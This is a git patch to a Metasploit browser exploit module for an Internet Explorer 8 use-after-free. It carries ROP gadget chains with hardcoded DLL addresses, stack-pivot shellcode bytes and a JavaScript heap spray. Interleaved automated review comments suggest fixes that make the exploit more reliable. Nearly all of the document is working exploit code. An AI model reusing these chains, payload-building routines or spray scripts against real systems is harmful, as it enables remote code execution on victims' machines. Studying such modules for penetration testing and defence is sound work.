From 075f6e8d4521070c6050605e53eee11849e4e5e5 Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Wed, 8 May 2013 15:42:45 -0500
Subject: [PATCH] Updates ROP chain and mstime_malloc usage
---
 .../windows/browser/ie_cgenericelement_uaf.rb | 96 ++++++-------------
 1 file changed, 29 insertions(+), 67 deletions(-)
diff --git a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
index e4b6c7ad0e..b6df709b68 100644
--- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -1,5 +1,4 @@
 ##
-#
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
@@ -83,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 def get_target(agent)
- #If the user is already specified by the user, we'll just use that
 return target if target.name != 'Automatic'
 nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
@@ -115,25 +113,16 @@ class Metasploit3 < Msf::Exploit::Remote
 return nil
 end
- def junk(n=4)
- rand_text_alpha(n).unpack("V")[0].to_i
- end
-
- def nop
- make_nops(4).unpack("V")[0].to_i
- end
-
 def get_payload(t, cli)
- code = payload.encoded
-
- # No rop. Just return the payload.
- return code if t['Rop'].nil?
+ rop_payload = ''
 case t['Rop']
 when :msvcrt
- case t.name
- when 'IE 8 on Windows XP SP3'
- rop_gadgets =
+ algin = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+ chain = ''
+
+ if t.name == 'IE 8 on Windows XP SP3'
+ chain =
 [
 0x77c1e844, # POP EBP # RETN [msvcrt.dll]
 0x77c1e844, # skip 4 bytes [msvcrt.dll]
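Review bot: `algin` on the added `algin = "\x81\xc4\x54\xf2\xff\xff"` line is a misspelling of `align`; the local is read again in a later hunk, so rename both uses, e.g. `align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500`. The removed `return code if t['Rop'].nil?` guard has no replacement: a target entry with no `'Rop'` key now falls into the `else` arm of `case t['Rop']` (closed in a later hunk) instead of returning the bare payload, which is a behaviour change if any entry in the targets table (outside this hunk) omits `'Rop'` — worth confirming. `chain = ''` is only ever overwritten by the two `t.name` branches, so a third name leaves it empty; see the note on the hunk that consumes `chain`. get_payload's body continues past the end of the hunk.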
@@ -158,8 +147,12 @@ class Metasploit3 < Msf::Exploit::Remote
 0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
 ].pack("V*")
- when 'IE 8 on Windows Server 2003'
- rop_gadgets =
+
+ elsif t.name == 'IE 8 on Windows Server 2003'
+ junk = rand_text_alpha(4).unpack("V")[0].to_i
+ nop = make_nops(4).unpack("V")[0].to_i
+
+ chain =
 [
 0x77bb2563, # POP EAX # RETN
 0x77ba1114, # <- *&VirtualProtect()
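Review bot: `junk` and `nop` are now locals defined only inside the `elsif` branch, replacing the `junk(n=4)` and `nop` helper methods deleted in an earlier hunk; if the 'IE 8 on Windows XP SP3' chain (which this hunk cuts through) or any other method still calls `junk`/`nop`, it will now raise NameError — confirm against the full file. The deleted helper also took a length parameter, whereas the local is fixed at four bytes. A one-line comment such as `# 4-byte filler / NOP dwords consumed by the Server 2003 chain below` would make the intent of the two locals clear. The `if`/`elsif` that this branch belongs to opens outside the hunk.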
@@ -187,40 +180,16 @@ class Metasploit3 < Msf::Exploit::Remote
 0x77be6591 # PUSHAD # ADD AL,0EF # RETN
 ].pack("V*")
 end
- else
- rop_gadgets =
- [
- 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
- 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
- 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
- 0x7c3415a2, # JMP [EAX] [msvcr71.dll]
- 0xffffffff,
- 0x7c376402, # skip 4 bytes [msvcr71.dll]
- 0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
- 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
- 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
- 0x7c344f87, # POP EDX # RETN [msvcr71.dll]
- 0xffffffc0, # Value to negate, will become 0x00000040
- 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
- 0x7c34d201, # POP ECX # RETN [msvcr71.dll]
- 0x7c38b001, # &Writable location [msvcr71.dll]
- 0x7c347f97, # POP EAX # RETN [msvcr71.dll]
- 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
- 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
- 0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]
- # rop chain generated with mona.py
- ].pack("V*")
- end
- rop_payload = rop_gadgets
- case t['Rop']
- when :msvcrt
- rop_payload << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+ rop_payload = chain + algin + payload.encoded
+
 else
- rop_payload << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
+ code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
+ code << payload.encoded
+ code << rand_text_alpha(12000)
+
+ rop_payload = generate_rop_payload('java', code)
 end
- rop_payload << code
- rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt
 return rop_payload
 end
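Review bot: `rop_payload = chain + algin + payload.encoded` silently builds a buffer with no ROP chain when neither `t.name` branch matched, because `chain` starts as `''` (earlier hunk) and the `if`/`elsif` above has no `else`; this replaces the old inner `case` that at least left `rop_gadgets` unset and failed loudly. Guard it before the concatenation, e.g. `fail_with(Failure::NoTarget, "No ROP chain for #{t.name}") if chain.empty?`. `algin` should be spelled `align` here as well as at its definition. The `case t['Rop']` this hunk closes opens in an earlier hunk.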
@@ -278,28 +247,22 @@ class Metasploit3 < Msf::Exploit::Remote
 CollectGarbage();
- hd = unescape("ABCD");
+ sparkle = unescape("ABCD");
 for (i=0; i < 2; i++) {
- unicorn += unescape("ABCD");
+ sparkle += unescape("ABCD");
 }
- unicorn += unescape("AB");
+ sparkle += unescape("AB");
+ sparkle += unescape("#{js_payload}");
- unicorn += unescape("#{js_payload}");
-
- animvalues = unescape("#{align_esp}");
+ magenta = unescape("#{align_esp}");
 for (i=0; i < 0x70/4; i++) {
- if (i == 0x70/4-1) {
- animvalues += unescape("#{xchg_esp}");
- }
- else {
- animvalues += unescape("#{align_esp}");
- }
+ if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
+ else { magenta += unescape("#{align_esp}"); }
 }
- animvalues += unicorn;
-
- mstime_malloc({shellcode:animvalues, heapBlockSize:0x38, objId:"myanim"});
+ magenta += sparkle;
+ mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
 }
@@ -315,12 +278,12 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 def on_request_uri(cli, request)
+ print_warning("test!!!!!!!!!!!!!")
 agent = request.headers['User-Agent']
 uri = request.uri
 print_status("Requesting: #{uri}")
 my_target = get_target(agent)
- # Avoid the attack if no suitable target found
 if my_target.nil?
 print_error("Browser not supported, sending 404: #{agent}")
 send_not_found(cli)
@@ -334,4 +297,3 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 end
-
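Review bot: `print_warning("test!!!!!!!!!!!!!")` at the top of `on_request_uri` looks like leftover debugging output — it fires on every request regardless of outcome and carries no information for the operator; drop the line before merging. The removed `# Avoid the attack if no suitable target found` comment was the only explanation of the 404 path below it, so keep a short one such as `# No usable target for this User-Agent: answer 404 rather than serve the page`. on_request_uri continues past the end of the hunk.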